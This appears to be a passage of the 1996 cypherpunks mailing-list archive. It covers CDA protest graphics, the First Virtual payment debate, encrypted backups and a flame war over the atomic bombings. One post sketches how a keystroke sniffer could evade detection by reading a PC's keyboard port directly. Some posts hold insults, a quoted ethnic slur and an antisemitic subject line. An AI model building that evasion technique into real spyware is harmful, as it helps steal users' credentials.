speaking for his employer.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Mon, 5 Feb 1996 00:29:20 +0800
To: dcrocker@brandenburg.com
Subject: RE: Don't type your yes/fraud response into your computer
Message-ID: <960204111411.202124c6@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


>	At base, the moral to the story is that a compromised user machine
>permits essentially any and all activities to be suborned.  Only a smart
>card mechanism stands a chance of standing up to this, but that, in effect,
>makes the smart card the 'user machine'.

True and has been one reason the smartcards/tokens/etc have been available
for years. The other side of the coin is expense - for a smart card and 
reader you are looking at over $100. For a token alone (you enter the 
one-time response) $30-$60. In a mass-market environment, this is not
supportable.

OTOH, keyboard sniffing software is easy to detect because it must go 
resident and it must intercept the keystrokes. The fact that no software
has bothered to do this does not mean that it cannot be done. The 
easiest way for such software to act would be to ignore the machine software
and when sensitive material is to be passed, to do so via direct port 
(hardware) access - been a while since I looked at it but AFAIR is around
port 60h. (PC type machines)

This would take care of anything sitting on Int 09 or Int 16 since it would
be bypassed. Often a problem that looks difficult when viewed as a whole
becomes simple once you disassemble it.

Rather than try to find a workaround for a machine you do not trust, why not
develop a means to trust it ? Can do with software alone and that is cheap.

						Warmly,
							Padgett

ps Dave, what is this thingie on the 21st ? May be in the area (opportunity
   for plug here 8*).

pps Before y'all get too wrapped up in free-speech vs libel in the US I would 
    suggest studying the difference between criminal law and civil.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security"<PADGETT%TCCSLR@emamv1.orl.mmc.com>
Date: Mon, 5 Feb 1996 00:51:28 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Futplex makes the news!
Message-ID: <01I0TB0U7ZR600MSLZ@emamv1.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain



>James Donald may characterize me as gutless. I think he would probably be 
>correct to some extent.

"Freedom is just another word for nothing more to lose." - Janis

						P.fla




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 5 Feb 1996 02:02:30 +0800
To: Cyberia Mailing List <cypherpunks@toad.com>
Subject: Need a "warning" graphic of some kind for CDA
Message-ID: <Pine.ULT.3.91.960204113444.21342B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Now that we all have web pages that are naughty and might be seen by 
little children, I'd like to hve some kind of a graphic that can 
universally be seen as a "Warning:  The following material is unsuitable 
for children and close-minded twits".  (or words to that effect).

Anybody with much more graphic design ability than I wanna take a crack 
at something that can be spread all over the net?  It shoudl poke as much 
fun as possible at the inaness of the CDA, while still being a legitimate 
effort to warn people that the material is offensive (just in case people 
start getting yanked off the street on CDA violations).



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMRTStjokqlyVGmCFAQGA3QQA0HOMcmxT+y8NbNtI/ak9Jc1kcmjK5v2l
pO17j14IGiz3I+EwXkYMHkCPMup2CyxBZ3YTNkQ4wc8bbtUrYGy/fBSs/yA8Gfy+
TxmGb5uzdLqdhhkJHwgG1CpOkYocX9EN/LUDQ1lB7jDpW5PjNTG1EMkGq1/L3nG5
O3vI3hLrltw=
=D/1b
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ang <mang@lisgar.edu.on.ca>
Date: Mon, 5 Feb 1996 01:40:35 +0800
To: cypherpunks@toad.com
Subject: "Nations see Internet as threat to security"
Message-ID: <199602041651.LAA05232@plethora.lisgar.edu.on.ca>
MIME-Version: 1.0
Content-Type: text



"Nations see Internet as threat to security" made the front page of the 
Saturday _Globe and Mail_.

There are some really nice lines in the article, which basically states 
that electronic freedoms through the Internet are a direct challenge to 
the power of nation states.  They mention all of the more recent 
examples in China, Germany, France, and the States.

Here are some of the more interesting paragraphs:

But as China, Germany,






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jordan Hayes <jordan@Thinkbank.COM>
Date: Mon, 5 Feb 1996 05:02:05 +0800
To: cypherpunks@toad.com
Subject: Re: Sometines ya just gotta nuke em-and nuke em again
Message-ID: <199602041956.LAA16514@Thinkbank.COM>
MIME-Version: 1.0
Content-Type: text/plain


	From tallpaul@pipeline.com Sun Feb  4 11:47:09 1996

	When I read the first post by T.C. May on the mass nuclear
	bombings of civilians I thought his post was: a) off-topic
	for the cypherpunks list and; b) wrong.

By the way, the certainly *is* a crypto-relevance to this thread,
since much of what we knew at the time about the Japanese high
command and their motivations and actions was learned through MAGIC
intercepts.  It also has quite a lot to do with how these intercepts
(and related documents) were released over time; the intentionality
of what was released, when, and how shows a good deal about how
this subject was managed by our government.

Since I practically started it (by calling into question Tim's
recitation of the story invented about the 500,000 Americans "saved"
by dropping the bomb), I'd like to call on those who are interested
in it to do some more searching, reading, analyzing and talking.

But not here.

Thanks,

/jordan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 5 Feb 1996 02:52:46 +0800
To: cypherpunks@toad.com
Subject: Re: Need a "warning" graphic of some kind for CDA
Message-ID: <2.2.32.19960204061752.00686e1c@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:37 AM 02/4/96 -0600, Robert A. Hayden wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Now that we all have web pages that are naughty and might be seen by 
>little children, I'd like to hve some kind of a graphic that can 
>universally be seen as a "Warning:  The following material is unsuitable 
>for children and close-minded twits".  (or words to that effect).
>
>Anybody with much more graphic design ability than I wanna take a crack 
>at something that can be spread all over the net?  It shoudl poke as much 
>fun as possible at the inaness of the CDA, while still being a legitimate 
>effort to warn people that the material is offensive (just in case people 
>start getting yanked off the street on CDA violations).
>

Hmmmmm. Maybe a doll with an international 'no' sign superimposed?

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRQyXcVrTvyYOzAZAQHXhQP/dnOLwoE5iTf5sNBwPaBl/1+7tXftWIc2
KyxSqqEhgLOcBssTo56Yt7r5TMFVukbWDirNuJW4xFRqFJovw2fG2XdpxMUJlVHF
McjIgXbddYWuyjZ+G04uiKcaoMRYFMFajOipIDkTYSNHBMkfDkxbLNrT3YMNpeCx
nDyvzpX+tGM=
=iqHi
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geocities.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ang <mang@lisgar.edu.on.ca>
Date: Mon, 5 Feb 1996 01:44:58 +0800
To: cypherpunks@toad.com
Subject: "Nations see Internet.." continued
Message-ID: <199602041718.MAA05257@plethora.lisgar.edu.on.ca>
MIME-Version: 1.0
Content-Type: text



Sorry about that -- here's the whole thing again


"Nations see Internet as threat to security" made the front page of the 
Saturday _Globe and Mail_.

There are some really nice lines in the article, which basically states 
that electronic freedoms through the Internet are a direct challenge to 
the power of nation states.  They mention all of the more recent 
examples in China, Germany, France, and the States.

The author obviously wasn't afraid of making large claims.  Most of them 
were acceptable, but some seemed completely unsubstantiated (see below).

Here are some of the more interesting paragraphs:

But as China, Germany, the United States and now France have discovered 
recently, data sent electronically over the Internet can be every bit as 
threatening to a country's laws or its culture as armies of yesteryear.  
But its elusive nature makes it difficult to track down and impossible to 
eradicate.  And there is growing concern that the very existence of the 
Internet is a threat to the nation-state.

[..]

"We think of states as unitary bodies, but what they really are is a 
bundle of sovereignties -- economic sovereignty, military sovereignty, 
cultural and social sovereignty."  That bundle is now coming undone, or 
as Mr. Saffo put it, "Digital technology is the solvent leaching the glue 
out of the state as we know it."

..

It's not just cultural or social sovereignty that governments worry 
about.  The power to tax is also being eroded by the increase in economic 
transactions that take place over the Internet, some encrypted so that 
prying eyes at the tax department could not read them even if a tax 
inspector was fortunate enough to stumble upon them.  Drug dealers and 
terrorists are resorting increasingly to this means of moving funds.

..

However, advocates of unregulated cyberspace says [sic] this just means 
that the only people using encryption programs at the moment are those 
doing it illegally.  It's a similar argument to the one often made in 
Canada against gun control -- the bad guys already have weapons.

..


Yay, more FUD.  The article does a good job of raising some of the 
important issues.  But I _highly_ doubt that "drug dealers and 
terrorists" are using digital cash to transfer funds.  They also 
characterize strong encryption as something evil.

The author implies that main reason for encrypting financial
transactions is to evade the tax department - if I'm sending my credit 
card # across the net, _of course_ I'm going to encrypt it, and
when using digital cash, encryption is generally part of authentication.

Comparing crypto to guns works in the sense that the "bad guys" will 
always be able to have access to them.  However, I for one support gun 
control but do not support mandatory limits on crypto.  Where I live,
there are no theats that justify allowing everyone to carry guns - the 
threat to privacy and freedom of speech justifies allowing everyone to 
use strong crypto.  You can use a gun to deprive another person of their 
life - what harm can you do another with PGP?  Perhaps you can harm them 
by being able to spread hate propaganda, but I don't think that that is a 
strong enough argument.

	- Mike.

If you've got to flame me, do it by email.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Farber <farber@central.cis.upenn.edu>
Date: Mon, 5 Feb 1996 02:16:49 +0800
To: "Robert A. Hayden" <cypherpunks@toad.com>
Subject: Re: Need a "warning" graphic of some kind for CDA
Message-ID: <2.2.32.19960204180104.006b16b0@linc.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Posted-Date: Fri, 2 Feb 1996 21:09:19 -0500
X-Sender: farber@linc.cis.upenn.edu
Date: Fri, 02 Feb 1996 21:09:19 -0500
From: Dave Farber <farber@central.cis.upenn.edu>
Subject: IP: Blue Ribbon Campaign invite [ with a endorsement from me
  djf]
To: interesting-people@eff.org (interesting-people mailing list)
X-Proccessed-By: mail2list

From: Dan Brown <brown@eff.org>

Greetings from the Electronic Frontier!


As you likely already know, on Feb. 1 1996 the United States House and
Senate voted on and overwhelmingly passed the Telecommunications Act almost
immediately after being reported out of committee, before the public was
able to read, much less comment upon this bill. 

The Electronic Frontier Foundation (EFF), decries the forfeiture of free
speech prescribed by the sweeping censorship provisions of the
telecommunications "reform" legislation

EFF is launching a campaign using a blue ribbon as a symbol to visually
communicate support for free speech in the electronic world.  As a provider
of content on the Internet we invite you to join in this awareness campaign
by displaying a link to our "Blue Ribbon" page where we will update what is
happening in the effort to preserve free speech. 

Pictures, HTML anchors and information on the progress of the campaign are
all available from http://www.eff.org/blueribbon.html. 

Don't wait in silence. Please join the fight against Internet Censorship!!



------------------------------------------------------



Dan Brown | System admin for the Electronic Frontier Foundation | brown@eff.org
    +1 415 436 9EFF Voice || +1 415 436 9993 Fax || +1 415 605 1481 Pager
         (Please leave area code _and_ phone number if you page me!)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Mon, 5 Feb 1996 02:33:41 +0800
To: Jeff Weinstein <jpp@software.net>
Subject: Re: Flaw in FV process (was FV and Netscape slagging each other off :-)
In-Reply-To: <2.2.32.19960131235757.00d078d8@mail.software.net>
Message-ID: <Ql5DNOuMc50e12cBg_@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.cypherpunks: 31-Jan-96 Flaw in FV process (was FV ..
John Pettitt@software.ne (1168*)

> In the FV model as I understand it I'd have to ship the software and wait for 
> an approve/deny/fraud from the user.  If it's anything but approved I'm SOL,
> I still have to pay Microsoft for the product but I didn't get paid.

Actually, that's not quite right.  People dealing in physical goods
typically ship them AFTER the "yes" response from the user.  And one of
the next enhancements to our system, currently implemented and in
testing in-house, will feature digitally signed notices to merchants
when credit card authorization is obtained.  At that point, the
merchant's risk will be no greater than in traditional mail-order credit
card sales.

> Solve that process flaw and I'll add FV support to software.net.

Glad to hear it!  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Mon, 5 Feb 1996 02:34:33 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: XMAS Exec
In-Reply-To: <HHiLiD4w165w@bwalk.dm.com>
Message-ID: <ol5DPvGMc50eR2cD0x@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.cypherpunks: 31-Jan-96 Re: FV Demonstrates Fatal F..
Dr. Dimitri Vulis@bwalk. (1227)

> I'd like to take an exception to this description of the XMAS EXEC, since
.............
> I had serious doubts that the person who wrote it was malicious.

Agreed completely.  I didn't mean to imply that the author was
malicious, merely that it well-illustrated the "social engineering"
approach to getting users to run untrusted code.  What I was saying is
that someone who *was* malicious could have used the same approach as
the attack vector for getting our credit card snooper (or other nasty
code) onto lots of consumer machines.  This came up, in the discussion,
because most people on this list seem to believe (correctly, I think)
that the hardest part of the attack we outlined is the initial infection
vector.  -- Nathanielx
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 5 Feb 1996 05:38:45 +0800
To: cypherpunks@toad.com
Subject: Concerning Jim Bell
Message-ID: <2.2.32.19960204211446.00948c20@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It has been brought to my attention that I did not make this as
clear as it should be.

        I consider Mr. Bell to be a crank and a loon.

        He has no interest in any sort of honest discussion.

        He wishes to draw in others in the hope of "punishing
me".

- From now on, I am ignoring all of his posts and "killfiling"
him.

You may now go back to your scheduled and unscheduled lives.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMRUhaeQCP3v30CeZAQGCpAf9FvV2sIHX9q5qajkgXWJsG7EG1JgMOvdH
XeRhc0qCrFJPcYfDBFvP6+Ck1dnsYNVzY+wDhMRDpHqky0KegRNENOFiU6NBhy+U
mbSCxlFU4FTa+xwRAm7BF8a0G1HGXkFzUOP6O7zf/WONE3+3EZr+aPlr0cm5maja
Xz5bRzi1SKlDQsxNK/msvYKXYyU5CLX2lVCGf7/qro2QezLNMz5skf9GJ9Tq7S5P
1gOiVjzNzYnmJj+76Uz+72zlvOHjIYrxf5FxsDsqqda2dBRyX9vmPmpWUMLBcoPi
kgZ4GtHryVgjKy5dkxk3U24hJIRYZiLwWl8gDiFuJDnC0PZwR3w7aQ==
=Lfox
-----END PGP SIGNATURE-----
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
         Is the operating system half NT or half full?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 5 Feb 1996 03:55:29 +0800
To: cypherpunks@toad.com
Subject: Re: Need a "warning" graphic of some kind for CDA
In-Reply-To: <2.2.32.19960204061752.00686e1c@arn.net>
Message-ID: <sFFsiD51w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"David K. Merriman" <merriman@arn.net> writes:
> >Now that we all have web pages that are naughty and might be seen by
> >little children, I'd like to hve some kind of a graphic that can
> >universally be seen as a "Warning:  The following material is unsuitable
> >for children and close-minded twits".  (or words to that effect).
>
> Hmmmmm. Maybe a doll with an international 'no' sign superimposed?

Either the 'no' sign (red crossed circle) or a wide red cross over one of:
 rattle
 baby bottle / pacifier
 disposable diapers (with contents visible)
  safety pin?

I'd like to think of some variation of skull+bones or the 'radioactive' sign.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 5 Feb 1996 04:23:18 +0800
To: cypherpunks@toad.com
Subject: Re: XMAS Exec
In-Reply-To: <ol5DPvGMc50eR2cD0x@nsb.fv.com>
Message-ID: <ZwFsiD52w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel Borenstein <nsb@nsb.fv.com> writes:
> Dr. Dimitri Vulis@bwalk. (1227)
>
> > I'd like to take an exception to this description of the XMAS EXEC, since
> .............
> > I had serious doubts that the person who wrote it was malicious.
>
> Agreed completely.  I didn't mean to imply that the author was
> malicious, merely that it well-illustrated the "social engineering"
> approach to getting users to run untrusted code.  What I was saying is
> that someone who *was* malicious could have used the same approach as
> the attack vector for getting our credit card snooper (or other nasty
> code) onto lots of consumer machines.  This came up, in the discussion,
> because most people on this list seem to believe (correctly, I think)
> that the hardest part of the attack we outlined is the initial infection
> vector.  -- Nathanielx

In '87, many people received an unsolicited executable from a known source, and
ran it without thinking twice. (If A has B's address in his nickname file, then
B probably knows and trusts A to some extent.) I hope users today know better.

I don't see why stopping a keyboard sniffer is any harder than stopping any
other virus/trojan - and most shops manage to keep them out.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 5 Feb 1996 06:36:01 +0800
To: cypherpunks@toad.com
Subject: Encryption and Backups
Message-ID: <2.2.32.19960204221301.0093a448@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Something that I have not seen addressed is the need for strong encryption
in backup software.

Most backup software has an "encryption" option, but I have seen few that
have anything resembling strong encryption.  Furthermore, I have seen no
real push for strong encryption for backups at all.

I see this as a product that corporations should be demanding.  It is
difficult to walk off with a computer, but a dat tape can be slipped in a
pocket with little notice.  If it happens to be of a server or important
system, valuable information would be in the hands of whoever could decrypt
it.  (And off site alot of resources could be thrown at decrypting the
data.) Weak or no encryption of backups could be a potential problem with
the security of a business.  (Of course, if you leave tapes lying around,
you are asking for trouble anyways...)

Might be an idea for a product there...  (And you can bet law enforcement
would throw a hissy fit about its existence.)

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
         Is the operating system half NT or half full?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brett Smith <bretts@trojan.neta.com>
Date: Mon, 5 Feb 1996 15:40:58 +0800
To: "'cypherpunks@toad.com>
Subject: retailer
Message-ID: <01BAF30A.FCA982E0@ppp-236-120.neta.com>
MIME-Version: 1.0
Content-Type: text/plain


please send info





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Mon, 5 Feb 1996 03:43:11 +0800
To: cypherpunks@toad.com
Subject: Re: Sometines ya just gotta nuke em-and nuke em again
Message-ID: <199602041921.OAA19675@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


"Neither the atomic bombing nor the entry of the Soviet Union 
into the war forced Japan's surrender. She was defeated before 
either of these events took place." 
 
     General of the Army Douglas MacArthur 
 
"It is my opinion that the use of this barbarous weapon at 
Hiroshima and Nagasaki was of no material success in our war 
against Japan. The Japanese were already defeated and ready to 
surrender because of the effective sea blockade and the 
successful bombing with conventional weapons. ... My own feeling 
was that in being the first to use it, we adopted an ethical 
standard common to the barbarians of the Dark Ages." 
 
     Admiral William Leahy, Chairman of the Joint Chiefs of Staff 
 
"The Japanese were ready to surrender and it wasn't necessary to 
hit them with that awful thing... I hated to see our country be 
the first to use such a weapon." 
 
     General of the Army Dwight D. Eisenhower 
 
These statements by the Allied military commanders were not 
deeply buried in graduate school libraries or military archives. 
They were widely printed and discussed in the media during last 
year's discussion over the Enola Gay exhibit at the Smithsonian 
Museum. 
 
Now the mere fact that the Allied military commanders all agreed 
that the nuclear bombings were unnecessary does not automatically 
mean that the commanders were correct. Theoretically, J.A. Donald 
and T.C. May might have a greater understanding. But both Donald 
and May must justify this hypothesis with evidence and logic, not 
mere assertion. 
 
Thus, J.A. Donald was perfectly free to write in Message-Id: 
<199602040622.WAA07274@shell1.best.com> on Feb. 03 22:20 that: 
 
"Paralax does not know shit from beans.  He presumably imagines 
that Tim is 'embarrassed' because Tim's knowledge of the 
historical facts differs from those facts dreamed up by the usual 
crew of apologists for totalitarian terror." 
 
In what way and to what extent did General of the Army MacArthur, 
the senior Allied commander in the Pacific Theater not "know shit 
from beans?" 
 
In what way and to what extent was MacArthur one of the "usual 
crew of apologists for totalitarian terror?" 
 
In what way and to what extent did Chief of Staff Leahy not know 
"shit from beans?" 
 
In what way and to what extent was Leahy one of the "usual crew 
of apologist for totalitarian terror?" 
 
In what way did General Eisenhower especially not know "shit from 
beans" about this issue, given his access to all available 
information when he was President? 
 
In what way and to what extent was President Eisenhower one of 
the "usual crew of apologists for totalitarian terror?" 
 
J.A. Donald seems particularly taken with the originality and 
accuracy of the phrase "shit for beans" to reflect certain states 
of philosophical and historical knowledge for he repeated it in 
his next message Message-Id: 
<199602040611.WAA18584@blob.best.net> on Feb. 3, 22:09 where he 
wrote: 
 
"SCHOLARLY RESEARCH!!!! 
 
"You do not know shit from beans:  Alperovitz is no more a 
scholar  than Zundel is:  He is a historical revisionist who lies 
even more crudely than the holocaust revisionists. 
 
"It is clear that in the opinion of the high command, the 
decision to  surrender after they were nuked was a dramatic and 
radical change of  position.  Alperovitz says otherwise, thus he 
is either grotesquely  ignorant or, more likely simply 
dishonest." 
 
In what way was General MacArthur an "historical revisionist" and 
in what way did he "lie even more crudely than the holocaust 
revisionists?" In what way was he "grotesquely ignorant or, more 
likely simply dishonest?" 
 
In what way of Chief of Staff Leahy? or President Eisenhower? 
 
One does not normally find J.A. Donald's phrases in civilized or 
cultured discourse over political and historical issues. His 
language is that of the demagogue, not the scientist. But he is 
entitled to use the language he wishes, just as other people have 
a similar right to examine his behavior and motivation in terms 
of identical language. 
 
We know, for example, that the pickpocket when caught may point 
to an innocent person and loudly cry "stop thief" in an effort to 
mislead the public by denouncing an innocent person for the very 
behavior for which the pickpocket is guilty. 
 
J.A. Donald voluntarily choose to present the dispute in terms of 
people who "don't know shit for beans," who are "apologists for 
totalitarian terror," who are "historical revisionists," who are 
"grotesquely ignorant or, more likely simply dishonest." 
 
Given the respective lineup of sources, what information and 
analysis would J.A. Donald present to us to lead us to conclude 
that his characterizations accurately reflect General MacArthur, 
Chief of Staff Leahy, and General Eisenhower rather than, like 
the pickpocket, J.A. Donald himself? 
 
T.C. May, while arguing essentially the same historic view as 
J.A. Donald (or rather vice versa) approaches the issue in a 
fundamentally different manner. T.C. May uses logic where J.A. 
Donald uses demagogic rhetoric. (I do not here refer to T.C. 
May's characterization of other racial/ethnic/national groups 
about which others on the list have posted.) 
 
When I read the first post by T.C. May on the mass nuclear 
bombings of civilians I thought his post was: a) off-topic for 
the cypherpunks list and; b) wrong. 
 
At that time I dismissed the idea of a public reply, thinking 
that he may have had a bad day, misunderstood the issue, or any 
of a thousand other reasons that have led me and indeed all of us 
to behave in a similar fashion at one time or another. 
 
But he re-posted on the thread in Message-Id: 
<ad392186040210048141@[205.199.118.202]> on Feb 3, 15:54 where he 
wrote: 
 
"(I've also received several long articles from people who seemed 
outraged that I was belittling the dropping of the bomb. I wasn't 
belittling it. Far from it. The Japs surrendered after the second 
bomb, so it was obviously not a trivial matter to them.)" 
 
I think his logic is at fault here in several ways. 
 
First, I think his logic is invalid because it is a "non 
sequitur." That is the statement that the Japanese did not take 
the bombing as trivial is true but not related to the argument. 
"2 + 2 = 4" is similarly true but unrelated; and I know of no 
group of people who, whatever their politics, consider mass 
nuclear bombings of civilians to be a "trivial matter." 
 
Second, I think his logic is invalid because it commits the "post 
hoc ergo propter hoc" fallacy that goes, in essence "after this, 
therefore because of this." 
 
"The Japanese surrender came after the bomb, therefore it came 
because of the bomb" is the invalid argument. One could, to use a 
"reductio ad absurdum" counter argument, saying with equal 
(in)validity that John Smith ate a bowl of beans, took a shit, 
and the next day the Japanese surrendered, therefore the 
surrender occurred because of the beans and the shit." 
 
Indeed the Japanese surrendered, but the evidence by three top 
(THE three top?) Allied commanders show that the surrender was 
not produced by either bombs, shit, or beans. 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 5 Feb 1996 05:07:54 +0800
To: Dave Farber <farber@central.cis.upenn.edu>
Subject: Re: Need a "warning" graphic of some kind for CDA
In-Reply-To: <2.2.32.19960204180104.006b16b0@linc.cis.upenn.edu>
Message-ID: <Pine.ULT.3.91.960204143409.27770A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[Information abotu the EFF's Blue Ribbion campain deleted to save space]

What I was proposing was not he blue ribbion.  The ribbion is for 
supporting basic electronic rights.  What kind of graphic I was looking 
for was something that would serve as a universal warning saying "The 
following is naughty stuff, don't look here except at your own risk".  A 
combination of disclaimer and warning and tongue-in-cheek protest against 
the inane laws.  

The Blue Ribbion is something different...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMRT8qDokqlyVGmCFAQHJZAP9GeSRQ1WqP4R5Z4Z2TufMAIa5mKAqNOAw
+enF2/yehDMLaAc39H1rCuIgtA+SfRnu2qehOyLOv+e7boAmsvsKj8AqxDWqhHtY
g0PppUT7lH33T6WqldN4/t1vHg51sdH2JN/KMrz09hw4L1JHBmbmJaFfzR1vHPYS
RI1pVs0oiiE=
=+LWV
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 5 Feb 1996 23:23:47 +0800
To: Stephan Mohr <cypherpunks@toad.com
Subject: Re: free speech and the government
Message-ID: <2.2.32.19960204224051.00955628@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:25 PM 2/4/96 +0000, Stephan Mohr wrote:

>Actually, I am glad that the whole story started over some neo-nazi stuff
>and not a recipe to easily make a very potent poison. 

For some strange reason, people believe it is difficult to find information
on such things.

I picked up my copy of _Poisons and Poisoners_ by C. J. S. Thompson at
Barnes and Noble in the discount section for $9.98.  Books on the topic can
also be picked up in bookstores catering to Murder Mystery fans.  (Some
excelent descriptions of esoteric poisons can be derived from these books.)

"Forbidden" information is hard to forbid with the existance of the printing
press.  Electronic networks make the information even more available.  Are
you suggesting that we burn all the books with "dangerous" information?  And
who's definition of "danger" do we take?  Yours? Mine? The National Council
of Churches?

Crypto relevence:  Some people regard the ability to hide "dangerous"
information to be as "dangerous" as the information hidden.  Freedom of
Speech includes the right to choose who can listen to that speech.

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
         Is the operating system half NT or half full?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 5 Feb 1996 07:06:47 +0800
To: Sean Gabb <cea01sig@gold.ac.uk>
Subject: Re: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
Message-ID: <2.2.32.19960204224813.0095ec64@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:20 PM 2/4/96 +0000, Sean Gabb wrote:
>What little I know about Mr Zundel convinces me that he's not the most 
>pleasant man to know.  But really, these purported messages from him are 
>so grossly unlikely, they defeat their object.

Why is it that so many people took those messages as _actually_ being from
the real Mr. Zundel?  The text is obviously a parody.

I guess most of Usenet has been disconnected from any reliable clue server...

